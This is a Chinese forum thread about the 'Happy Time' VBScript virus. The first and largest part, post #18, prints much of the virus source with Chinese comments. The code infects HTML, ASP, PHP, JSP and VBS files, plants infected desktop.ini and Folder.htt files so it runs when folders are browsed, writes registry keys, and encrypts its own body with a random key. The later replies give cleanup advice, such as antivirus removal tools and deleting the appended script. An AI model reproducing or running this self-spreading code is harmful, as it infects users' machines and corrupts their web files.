    If Left(ThisLocation, 4) = "file" Then
        ThisLocation = Mid(ThisLocation,9)
        If FSO.GetExtensionName(ThisLocation) <> "" then
            ThisLocation = Left(ThisLocation,Len(ThisLocation) - Len(FSO.GetFileName(ThisLocation)))
        End If
        If Len(ThisLocation) > 3 Then
            ThisLocation = ThisLocation & "\"
        End If
        ' 感染本目录下可以感染的所有文件
        KJummageFolder(ThisLocation)
    End If
End Function


' ------------------------------------------------------------------------------
Function KJMailReg(RegStr,FileName)
    On Error Resume Next
    RegTempStr = WsShell.RegRead(RegStr)
    If RegTempStr = "" Then
        WsShell.RegWrite RegStr,FileName
    End If
End Function


' ------------------------------------------------------------------------------
Function KJOboSub(CurrentString)
    SubE = 0
    TestOut = 0
    Do While True
        TestOut = TestOut + 1
        If TestOut > 28 Then
            CurrentString = FinalyDisk & ":\"
            Exit Do
        End If
        On Error Resume Next
        Set ThisFolder = FSO.GetFolder(CurrentString)
        Set DicSub = CreateObject("Scripting.Dictionary")
        Set Folders = ThisFolder.SubFolders
        FolderCount = 0
        For Each TempFolder in Folders
            FolderCount = FolderCount + 1
            DicSub.add FolderCount, TempFolder.Name
        Next
        If DicSub.Count = 0 Then
            LastIndexChar = InstrRev(CurrentString,"\",Len(CurrentString)-1)
            SubString = Mid(CurrentString,LastIndexChar+1,Len(CurrentString)-LastIndexChar-1)
            CurrentString = KJChangeSub(CurrentString,LastIndexChar)
            SubE = 1
        Else
            If SubE = 0 Then
                CurrentString = CurrentString & DicSub.Item(1) & "\"
                Exit Do
            Else
                j = 0
                For j = 1 To FolderCount
                    If LCase(SubString) = LCase(DicSub.Item(j)) Then
                        If j < FolderCount Then
                            CurrentString = CurrentString & DicSub.Item(j+1) & "\"
                            Exit Do
                        End If
                    End If
                Next
                LastIndexChar = InstrRev(CurrentString,"\",Len(CurrentString)-1)
                SubString = Mid(CurrentString,LastIndexChar+1,Len(CurrentString)-LastIndexChar-1)
                CurrentString = KJChangeSub(CurrentString,LastIndexChar)
            End If
        End If
    Loop
    KJOboSub = CurrentString
End Function

#18


' ------------------------------------------------------------------------------
Function KJPropagate()
    On Error Resume Next
    RegPathValue = "HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook Express\Degree"
    DiskDegree = WsShell.RegRead(RegPathValue)
    If DiskDegree = "" Then
        DiskDegree = FinalyDisk & ":\"
    End If
    For i=1 to 5
        DiskDegree = KJOboSub(DiskDegree)
        KJummageFolder(DiskDegree)
    Next
    WsShell.RegWrite RegPathValue,DiskDegree
End Function


' ------------------------------------------------------------------------------
Function KJummageFolder(PathName)
    On Error Resume Next
    Set FolderName = FSO.GetFolder(PathName)
    Set ThisFiles = FolderName.Files
    HttExists = 0

    ' 感染本文件夹中每一个符合条件的文件(.Htm, .html, .asp, .php, .jsp, .vbs)
    For Each ThisFile In ThisFiles
        FileExt = UCase(FSO.GetExtensionName(ThisFile.Path))
        If FileExt = "HTM" Or FileExt = "HTML" Or FileExt = "ASP" Or FileExt = "PHP" Or FileExt = "JSP" Then
            Call KJAppendTo(ThisFile.Path,"html")
        ElseIf FileExt = "VBS" Then
            Call KJAppendTo(ThisFile.Path,"vbs")
        ElseIf FileExt = "HTT" Then
            HttExists = 1
        End If
    Next
    If (UCase(PathName) = UCase(WinPath & "Desktop\")) Or (UCase(PathName) = UCase(WinPath & "Desktop"))Then
        HttExists = 1
    End If

    ' 如果本文件夹中没有 .htt 文件,那就把已经准备好的染毒文件复制过来
    ' 这样做的目的在于使用户浏览文件夹的时候就可以运行病毒程序
    If HttExists = 0 Then
        FSO.CopyFile WinPath & "system32\desktop.ini",PathName
        FSO.CopyFile WinPath & "web\Folder.htt",PathName
    End If
End Function


' ------------------------------------------------------------------------------
Function KJSetDim()
    On Error Resume Next

    ' 判断病毒体在何种文件中被执行
    Err.Clear
    TestIt = WScript.ScriptFullname
    If Err Then
        InWhere = "html"
    Else
        InWhere = "vbs"
    End If

    If InWhere = "vbs" Then
        Set FSO = CreateObject("Scripting.FileSystemObject")
        Set WsShell = CreateObject("WScript.Shell")
    Else
        Set AppleObject = document.applets("KJ_guest")
        AppleObject.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}")
        AppleObject.createInstance()
        Set WsShell = AppleObject.GetObject()
        AppleObject.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}")
        AppleObject.createInstance()
        Set FSO = AppleObject.GetObject()
    End If
    Set DiskObject = FSO.Drives
    For Each DiskTemp In DiskObject
        If DiskTemp.DriveType <> 2 And DiskTemp.DriveType <> 1 Then
            Exit For
        End If
        FinalyDisk = DiskTemp.DriveLetter
    Next

    ' 产生随机加密密钥
    Dim OtherArr(3)
    Randomize
    For i=0 To 3
        OtherArr(i) = Int((9 * Rnd))
    Next

    ' 用随机加密密钥将病毒体加密
    ' 加密后的病毒体放在 TempString 中
    TempString = ""
    For i=1 To Len(ThisText)
        TempNum = Asc(Mid(ThisText,i,1))
        If TempNum = 13 Then
            TempNum = 28
        ElseIf TempNum = 10 Then
            TempNum = 29
        End If
        TempChar = Chr(TempNum - OtherArr(i Mod 4))
        If TempChar = Chr(34) Then
            TempChar = Chr(18)
        End If
        TempString = TempString & TempChar
    Next

    ' 形成各种感染所需的数据
    ' UnLockStr 中存放解密使用的程序
    UnLockStr = "Execute(""Dim KeyArr(3),ThisText""&vbCrLf&""KeyArr(0) = " & OtherArr(0) & """&vbCrLf&""KeyArr(1) = " & OtherArr(1) & """&vbCrLf&""KeyArr(2) = " & OtherArr(2) & """&vbCrLf&""KeyArr(3) = " & OtherArr(3) & """&vbCrLf&""For i=1 To Len(ExeString)""&vbCrLf&""TempNum = Asc(Mid(ExeString,i,1))""&vbCrLf&""If TempNum = 18 Then""&vbCrLf&""TempNum = 34""&vbCrLf&""End If""&vbCrLf&""TempChar = Chr(TempNum + KeyArr(i Mod 4))""&vbCrLf&""If TempChar = Chr(28) Then""&vbCrLf&""TempChar = vbCr""&vbCrLf&""ElseIf TempChar = Chr(29) Then""&vbCrLf&""TempChar = vbLf""&vbCrLf&""End If""&vbCrLf&""ThisText = ThisText & TempChar""&vbCrLf&""Next"")" & vbCrLf & "Execute(ThisText)"
    ThisText = "ExeString = """ & TempString & """"
    HtmlText ="<" & "script language=vbscript>" & vbCrLf & "document.write " & """" & "<" & "div style='position:absolute; left:0px; top:0px; width:0px; height:0px; z-index:28; visibility: hidden'>" & "<""&""" & "APPLET NAME=KJ""&""_guest HEIGHT=0 WIDTH=0 code=com.ms.""&""activeX.Active""&""XComponent>" & "<" & "/APPLET>" & "<" & "/div>""" & vbCrLf & "<" & "/script>" & vbCrLf & "<" & "script language=vbscript>" & vbCrLf & ThisText & vbCrLf & UnLockStr & vbCrLf & "<" & "/script>" & vbCrLf & "<" & "/BODY>" & vbCrLf & "<" & "/HTML>"
    VbsText = ThisText & vbCrLf & UnLockStr & vbCrLf & "KJ_start()"

    ' 得到 Windows 所在的路径
    WinPath = FSO.GetSpecialFolder(0) & "\"

    ' 将原 C:\Windows\Web\Folder.htt 复制为 C:\Windows\Web\kjwall.gif
    If (FSO.FileExists(WinPath & "web\Folder.htt")) Then
        FSO.CopyFile WinPath & "web\Folder.htt",WinPath & "web\kjwall.gif"
    End If

    ' 将原 C:\Windows\System32\desktop.ini 复制为 C:\Windows\System32\kjwall.gif
    If (FSO.FileExists(WinPath & "system32\desktop.ini")) Then
        FSO.CopyFile WinPath & "system32\desktop.ini",WinPath & "system32\kjwall.gif"
    End If
End Function

#19


去金山的网站,我在那里下了个免费的专杀新快乐时光病毒的软件,可以解决

#20


我遇到过,同意 zhuxiaohua982的观点
我没恢复注册表。

#21


用金山的专用工具可以处理干净,我个人的经历还是不要手工删除,只会月删除越多,至于修改注册表,个人的经验是修改完以后不要正常关机,否则如果有交叉感染的话,你所有的努力都是白费。以前为了对付一些木马,使用的办法是修改以后直接RESET机器(按RESET按钮)这样会好一些!

#22


我也中过一次,但是删掉了就好了,如果网页也被感染了,用记事本打开,然后会发现在“html”后面有多出来一段“html”(带有vbscript的),把后面的“html”删掉就好了。不知道对不对?结果没事了。

#23


该病毒是一种vb脚本病毒,主要通过复制,执行病毒程序感染并实现传播.
病毒发作时,将查找各个目录并复制desktop.ini和folder.htt到目录下,
同时全盘查找*.html文件,并加入vb脚本代码.
杀毒:用瑞星2002的僧级版本即可